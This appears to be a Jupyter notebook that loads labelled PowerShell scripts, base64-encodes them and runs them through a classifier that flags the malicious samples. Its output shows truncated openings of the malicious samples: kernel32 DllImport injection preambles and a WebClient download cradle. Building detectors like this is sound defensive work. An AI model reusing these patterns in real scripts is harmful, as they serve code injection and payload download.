In [1]:
from os import path

PROJECT_ROOT = path.abspath(path.join(globals()['_dh'][0], '..'))
DATALAKE_PATH = path.abspath(path.join(PROJECT_ROOT, '..', '..', 'datalake', 'xplainproj'))
FQFN_PROCESSED_DF = path.join(DATALAKE_PATH, 'processed', f'processed_20250207.jsonl')
MODEL_DIR = path.abspath(path.join(PROJECT_ROOT, 'xplainproj', 'classifier'))

In [2]:
import base64
import os

import pandas as pd


def encode_text_body(text_body: str | bytes) -> str:
    """
    Returns Base64-encoded string version of a UTF-8 string or bytes representing a UTF-8 string
    """
    if isinstance(text_body, bytes):
        return base64.b64encode(text_body).decode('utf-8')
    else:
        return base64.b64encode(text_body.encode('utf-8')).decode('utf-8')


def text_as_base64(fqfn: str) -> tuple[str, str]:
    with open(fqfn, 'r') as f:
        text_bytes = f.read()
        b64str = encode_text_body(text_bytes)
        return text_bytes, b64str


def read(folder_path: str, labels: list[str] = ['0', '1'], k: int = 3) -> pd.DataFrame:
    txt_fqfns: list[str] = []
    txt_file_names: list[str] = []
    txt_file_names_b64: list[str] = []
    txt_lengths: list[int] = []
    txt_b64s: list[str] = []
    txt_contents: list[str] = []
    txt_labels: list[int] = []

    for label in labels:
        label_counter = 0
        label_folder = os.path.join(folder_path, label)
        if not os.path.isdir(label_folder):
            continue  # Skip if the folder does not exist

        for file_name in os.listdir(label_folder):
            if file_name.endswith('.ps1'):
                label_counter += 1
                if label_counter > k:
                    break

                txt_file_names.append(file_name)
                txt_file_names_b64.append(encode_text_body(file_name))

                text_fqfn = os.path.join(label_folder, file_name)
                txt_fqfns.append(text_fqfn)

                text_bytes, b64str = text_as_base64(text_fqfn)
                txt_b64s.append(b64str)
                txt_contents.append(text_bytes)

                txt_lengths.append(len(text_bytes))
                txt_labels.append(int(label))


    return pd.DataFrame(data={
        'file_name': txt_file_names,
        'file_name_b64': txt_file_names_b64,
        'fqfn': txt_fqfns,
        'text': txt_contents,
        'text_size': txt_lengths,
        'text_body_b64': txt_b64s,
        'label': txt_labels,
    })


In [3]:
df = read(DATALAKE_PATH, labels=['0', '1'], k=3)
df[['file_name_b64', 'text_body_b64', 'label']]

Unnamed: 0,file_name_b64,text_body_b64,label
0,MTMwMi5wczE=,CmZ1bmN0aW9uIFRlc3QtQ1ByaXZpbGVnZQp7CiAgICAKIC...,0
1,MTI3LnBzMQ==,77u/CgoKCgpmdW5jdGlvbiBHZXQtQXV0aFRva2VuIHsKCg...,0
2,MTEyOC5wczE=,CgoKCgoKCgoKCgoKJENhdGVnb3J5TmFtZSA9ICdDYXJib2...,0
3,MTMwMi5wczE=,CiRDM0ggPSAnW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIi...,1
4,MTI3LnBzMQ==,CihOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS...,1
5,MTEyOC5wczE=,CiRjID0gJ1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXX...,1


In [4]:
from xplainproj.classifier.inf_server_driver import InferenceServerDriver

model = InferenceServerDriver()
df['outcome'] = model.predict(inputs=df)
print(df[['text', 'text_size', 'label', 'outcome']])


2025-02-07 14:41:08,637 - tensorcraft - INFO - XLA Device Not Supported: No module named 'torch_xla'
2025-02-07 14:41:08,646 - tensorcraft - INFO - Pytorch version=2.6.0 preferred device=mps build with MPS support=True


0
0
0
1
1
1
                                                text  text_size  label  \
0  \nfunction Test-CPrivilege\n{\n    \n    [Cmdl...        542      0   
1  ﻿\n\n\n\n\nfunction Get-AuthToken {\n\n\n\n[cm...      87178      0   
2  \n\n\n\n\n\n\n\n\n\n\n\n$CategoryName = 'Carbo...       6819      0   
3  \n$C3H = '[DllImport("kernel32.dll")]public st...       2337      1   
4  \n(New-Object System.Net.WebClient).DownloadFi...        157      1   
5  \n$c = '[DllImport("kernel32.dll")]public stat...       2324      1   

   outcome  
0        0  
1        0  
2        0  
3        1  
4        1  
5        1  
